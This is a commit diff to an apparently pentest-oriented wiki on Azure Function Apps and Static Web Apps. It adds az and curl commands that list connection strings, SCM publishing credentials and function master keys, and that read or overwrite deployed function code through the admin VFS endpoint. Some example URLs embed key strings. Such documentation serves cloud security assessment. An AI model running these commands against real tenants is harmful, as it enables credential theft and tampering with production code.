az functions

2025-12-28 21:53:15 -08:00 · 2025-02-24 11:27:01 +01:00
parent 2d32b37d9c
commit a19517f026
5 changed files with 71 additions and 13 deletions
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -143,20 +143,29 @@ az rest --method GET \

 # Access
 curl "<script-href>?code=<master-key>"
-## Python example:
+# Python function app example
 curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
+# JavaScript function app example
+curl "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" -v
 ```

 And to **change the code that is being executed** in the function with:

 ```bash
 # Set the code to set in the function in /tmp/function_app.py
-## The following continues using the python example
+## Python function app example
 curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" \
 --data-binary @/tmp/function_app.py \
 -H "Content-Type: application/json" \
 -H "If-Match: *" \
 -v
+
+# NodeJS function app example
+curl -X PUT "https://consumptionexample.azurewebsites.net/admin/vfs/site/wwwroot/HttpExample/index.js?code=tKln7u4DtLgmG55XEvMjN0Lv9a3rKZK4dLbOHmWgD2v1AzFu3w9y_A==" \
+--data-binary @/tmp/index.js \
+-H "Content-Type: application/json" \
+-H "If-Match: *" \
+-v
 ```

 ### `Microsoft.Web/sites/functions/listKeys/action`
@@ -258,6 +267,25 @@ az rest --method PUT \
  --uri "https://management.azure.com/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \
  --headers '{"Content-Type": "application/json", "If-Match": "*"}' \
  --body @/tmp/body
+
+# Through the SCM URL (using Azure permissions or SCM creds)
+az rest --method PUT \
+    --url "https://consumptionexample.scm.azurewebsites.net/api/vfs/site/wwwroot/HttpExample/index.js" \
+  --resource "https://management.azure.com/" \
+  --headers "If-Match=*" \
+  --body 'module.exports = async function (context, req) {
+    context.log("JavaScript HTTP trigger function processed a request. Training Demo 2");
+
+    const name = (req.query.name || (req.body && req.body.name));
+    const responseMessage = name
+        ? "Hello, " + name + ". This HTTP triggered function executed successfully. Training Demo 2"
+        : "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response. Training Demo 2";
+
+    context.res = {
+        // status: 200, /* Defaults to 200 */
+        body: responseMessage
+    };
+}'
 ```

 ### `Microsoft.Web/sites/publishxml/action`, (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`)
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md
@@ -151,6 +151,9 @@ az rest --method POST \

 Then, in order to **update an app using the token** you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future.

+> [!TIP]
+> To deploy the app you could use the **`swa`** tool from [https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token](https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token) of follow the following raw steps:
+
 1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`.
 2. Change the code you want to deploy
 3. Deploy it running (Remember to change the `<api-token>`):
--- a/src/pentesting-cloud/azure-security/az-services/az-app-services.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-app-services.md
@@ -25,6 +25,7 @@ Apps have some interesting configurations:
  - The URL containing the credentials for the database and Redis will be stored in the **appsettings**.
 - **Container**: It's possible to deploy a container to the App Service by indicating the URL of the container and the credentials to access it.
 - **Mounts**: It's possible to create 5 mounts from Storage accounts being these Azure Blob (Read-Only) or Azure Files. The configuration will store the access key over the Storage Account.
+- **Netowrking**: Can be publicly abaible or only accessible private endpoints from a VNet.


 ## Basic Authentication
--- a/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
@@ -214,10 +214,10 @@ Moreover, **no source code will be stored in the storage** account related to th
 # List all the functions
 az functionapp list

-# Get info of 1 funciton (although in the list you already get this info)
-az functionapp show --name <app-name> --resource-group <res-group>
-## If "linuxFxVersion" has something like: "DOCKER|mcr.microsoft.com/..."
-## This is using a container
+# List functions in an function-app (endpoints)
+az functionapp function list \
+  --name <app-name> \
+  --resource-group <res-group>

 # Get details about the source of the function code
 az functionapp deployment source show \
@@ -234,6 +234,9 @@ az functionapp config container show \
 # Get settings (and privesc to the sorage account)
 az functionapp config appsettings list --name <app-name> --resource-group <res-group>

+# Get access restrictions
+az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
+
 # Check if a domain was assigned to a function app
 az functionapp config hostname list --webapp-name <app-name> --resource-group <res-group>

@@ -243,17 +246,36 @@ az functionapp config ssl list --resource-group <res-group>
 # Get network restrictions
 az functionapp config access-restriction show --name <app-name> --resource-group <res-group>

-# Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code)
-az rest --method GET \
-  --url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
+# Get acess restrictions
+az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
+
+# Get connection strings
+az rest --method POST --uri "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/connectionstrings/list?api-version=2022-03-01"
+az rest --method GET --uri "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/configreferences/connectionstrings?api-version=2022-03-01"
+
+# Get SCM credentials
+az functionapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
+
+# Get function, system and master keys
+az functionapp keys list --name <app-name> --resource-group <res-group>
+
+# Get Host key
+az rest --method POST --uri "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<function-endpoint-name>/listKeys?api-version=2022-03-01"

 # Get source code with Master Key of the function
 curl "<script_href>?code=<master-key>"
-## Python example
-curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" -v
+curl "https://<func-app-name>.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" -v
+
+# Get source code using SCM access (Azure permissions or SCM creds)
+az rest --method GET \
+  --url "https://<func-app-name>.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" \
+  --resource "https://management.azure.com/"
+
+# Get source code with Azure permissions
+az rest --url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
+## Another example
+az rest --url "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/ConsumptionExample/hostruntime/admin/vfs/HttpExample/index.js?relativePath=1&api-version=2022-03-01"

-# Get source code
-az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
 ```
 {{#endtab }}

--- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -115,6 +115,10 @@ az staticwebapp secrets list --name <name>
 # Get invited users
 az staticwebapp users list --name <name>

+# Get current snippets
+az rest --method GET \
+  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/trainingdemo/snippets?api-version=2022-03-01"
+
 # Get database connections
 az rest --method GET \
  --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/databaseConnections?api-version=2021-03-01"